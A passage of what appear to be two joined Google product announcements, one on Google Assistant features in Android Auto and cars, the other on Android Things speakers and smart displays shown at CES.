Android Auto is available in tens of millions of cars on more than 400 models from 40+ brands, including Ford, General Motors, Nissan, Volkswagen and Volvo. With the Assistant in Android Auto, you can listen to your playlists from apps like Spotify or Google Play Music, get quick directions from Google Maps or Waze, and send or receive messages from services like WhatsApp. And soon, you’ll be able to reserve a parking space with SpotHero or order your favorite handcrafted drink or food from Starbucks—all from the road.

Assistant on Android auto

You can use the Assistant in Android Auto on your car display by connecting your Android phone to a supported car—or you can use it on your phone screen in any car. And we're working with auto makers to integrate the Assistant directly into their cars—no phone required.

With the Assistant on your phone, speaker or TV, you can also check your fuel level, lock doors, and more. This feature is already available on cars from BMW, Mercedes-Benz and Hyundai—and today we're announcing that it'll be coming to cars from Kia and Fiat Chrysler Automobiles.

Always ready to help

Since the Assistant can do so many things, we're introducing a new way to talk about them. We’re calling them Actions. Actions include features built by Google—like directions on Google Maps—and those that come from developers, publishers and other third parties, like working out with Fitbit Coach. So finding photos with Google Photos would be one Action while meditating with Headspace would be another. All in all, today there are more than a million Actions you can take with your Assistant.

To help you discover the Actions available on the Assistant, we have a new directory page. You can also explore them with your Assistant on your Android phone or iPhone: just go to your Assistant, select the blue icon in the corner and dive in. We bet you’ll find a few gems you never knew the Assistant could do. And the best part? We're always adding more Actions.

Actions

That’s our news for the day. We’re just a few days into the new year and continuing to make the Assistant more helpful and more available, no matter what device you’re using. We can’t wait to see what you do with the Assistant this year.

New Products At CES powered by Android Things

By Venkat Rapaka, Director of Product Management, Google

The Android Things team has been working closely with our partners to create compelling, secure and thoughtful IoT products. During the Consumer Electronics Show (CES) in Las Vegas, a number of our OEM partners are announcing their first set of products powered by Android Things. These products are built on certified Android Things System-on-Modules (SoMs) from our silicon partners, benefit from regular feature and security updates from Google, and have the Google Assistant and Google Cast seamlessly built in.

New voice-activated speakers powered by Android Things are being announced at CES, including the LG ThinQ WK7 and iHome iGV1. Turnkey hardware solutions based on the Qualcomm SD212 Home Hub Platform, MediaTek MT8516 and Rockchip RK3229 SoM are certified for the Assistant and Cast, and NXP i.MX 8M is coming soon. Three of our Original Design Manufacturer (ODM) partners, Tymphany, Goertek, and Tonly, have created full speaker reference designs based on these SoMs to further reduce development cost and time-to-market.

Today, we also announced that the Google Assistant is coming to smart displays powered by Android Things. These new devices have the Assistant and Cast built in, and with the added benefit of a touch screen, they can help you see and do more. Smart displays from JBL, Lenovo, LG (all based on the Qualcomm SD624 Home Hub Platform) and Sony (based on the MediaTek MT8173 SoM) will be available later this year.

Of course, Android Things is designed to support a wide variety of devices beyond speakers and smart displays. Prototype demos such as HandBot, DrawBot, a 3D printer, and AI artwork T-shirts can be found in the NXP booth.

Starting tomorrow, you can visit the Google Assistant Playground (booth CP-21) at CES to view new products, chipsets, and reference designs by our partners. In addition, these devices are also available for display in other company spaces throughout the conference, including Lenovo, LG, JBL, Qualcomm, MediaTek, NXP, Rockchip, iHome, Goertek, and Tymphany.

Android Things is currently in Developer Preview, and you can get started with the latest version, DP6.1. You can use the Android Things Console to download system images and flash existing devices. You can give feedback by filing bug reports and feature requests, as well as on Stack Overflow or in Google's IoT Developers Community. The Long Term Support release will be available this year, with more details coming soon.